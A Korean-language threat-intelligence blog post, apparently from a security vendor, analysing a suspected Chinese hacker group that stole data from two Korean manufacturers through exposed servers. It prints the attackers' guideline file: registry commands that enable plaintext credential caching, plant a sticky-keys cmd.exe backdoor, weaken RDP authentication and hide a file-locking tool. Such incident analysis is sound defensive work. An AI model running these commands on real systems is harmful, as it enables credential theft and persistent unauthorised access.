중국 해커 조직의 국내 기업 정보 탈취
최근 SQL 서버나 IIS 웹서버와 같이 외부에서 접근 가능한 취약한 서버를 대상으로 공격하는 침해 사례가 빈번히 확인되고 있다.
이번 사례에서 확인된 피해 기업은 총 2곳으로 반도체 업체와 AI를 활용한 스마트 제조업체이다. 해킹 공격을 수행한 공격 그룹에서 해킹 도구의 사용법이 적힌 중국어 텍스트 파일이 확인되어 샤오치잉과 Dalbit(달빗)과 같이 중국 해커 그룹으로 추정하고 있다.
중국 해커 그룹의 가이드 라인
| reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f reg add “HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe” /v “Debugger” /t REG_SZ /d “\”c:\windows\system32\cmd.exe\” /z” /f REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v UserAuthentication /t REG_DWORD /d 0 /f REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v SecurityLayer /t REG_DWORD /d 0 /f !! 禁止强制名,以管理的身行cmd 行以下命令 Win2012 Can: \Easy File Locker (!!!注意:只需要予Access限,其他都不需要,切切) 除1. REG delete “HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Easy file Locker” /f C:/Users/Public/Documents/EFL/rule.ini 藏的定在此 cmd.exe /c reg add “HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /t REG_DWORD /v portnumber /d 3389 /f 1.reg add “HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /t REG_DWORD /v portnumber /d 3389 /f \配置端口3389 reg add “HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe” /v “Debugger” /t REG_SZ /d “\”c:\windows\system32\cmd.exe\” /z” /f |
[표 1] 해커 그룹이 사용한 해킹 도구 가이드 라인 텍스트 파일
공격자 서버 및 유출 정보
현재 확인된 공격자의 서버는 아래와 같다.
FRP 관리 서버
공격자는 피해 기업 서버에 FRP를 설치하였다. 따라서 [그림 1]의 해당 페이지에는 FRP가 설치된 감염 PC와 공격자가 사용하는 프록시 서버 정보를 확인할 수 있다.
FRP를 이용한 공격 방법은 이전 블로그인 ‘Dalbit’ APT 그룹과 AhnLab TIP 서비스 ‘다양한 원격 제어 도구들을 악용하는 공격 사례 분석 보고서‘에서 자세히 기술하였다.
달빗(Dalbit,m00nlight): 중국 해커 그룹의 APT 공격 캠페인 – ASEC BLOG
0. 개요 해당 내용은 2022년 8월 16일에 공개된 ‘국내 기업 타겟의 FRP(Fast Reverse Proxy) 사용하는 공격 그룹’ 블로그의 연장선으로, 해당 그룹의 행보를 추적한 내용이다. 이 그룹은 과거부터 지금까지 오픈 소스 도구를 주로 사용하고 PDB 등에 정보가 없어 프로파일링의 명확한 특징이 부족했다. 또한 C2(Command&Control) 서버는 국내 기업 서버를 악용하여 피해 기업이 조사를 따로 요청하지 않는 경우 수집할 수 있는 정보가 한정적이었다. 허나 블로그가 공개되고 공격자가 사용 중이던 국내 기업…
국내 기업 타겟의 FRP(Fast Reverse Proxy) 사용하는 공격 그룹 – ASEC BLOG
최근 외부에 노출된 취약한 서버를 시작으로 하여 침투한 공격자가 내부 네트워크까지 장악하는 침해 사고가 국내 기업들을 대상으로 빈번히 이루어지고 있다. 취약한 Atlassian Confluence 서버를 대상으로 하는 공격 사례 국내 의료기관의 취약한 서버를 대상으로 유포된 미터프리터(Meterpreter) 취약한 MySQL 서버를 대상으로 유포 중인 AsyncRAT 악성코드 이번 사례는 IIS 웹서버나 MS Exchange 서버 침해 사고로 기존에 알려진 유형과 동일하나, 개인이 아닌 특정 공격 그룹으로 추정되는 사례를 소개하고자…
파일 서버
해당 서버에는 CobaltStrike, VPN, Remote Control 해킹 도구 등과 많은 로그 파일이 존재한다. 해당 로그 파일은 [그림 2]와 같이 번호로 이뤄진 디렉토리 안에 존재하며, 절취한 로그에는 자격 증명 정보와 네트워크 정보 그리고 기업 내부 자료로 추정되는 정보가 존재한다.
공격자 C2 서버는 아직 연결이 가능한 상태로 피해 기업의 정보가 일부 노출되어 있다. 따라서 2차 피해를 막기 위해 공개하지 않는다.
AhnLab TIP를 구독하시면 연관 IOC 및 상세 분석 정보를 추가적으로 확인하실 수 있습니다. 자세한 내용은 아래 배너를 클릭하여 확인해보세요.
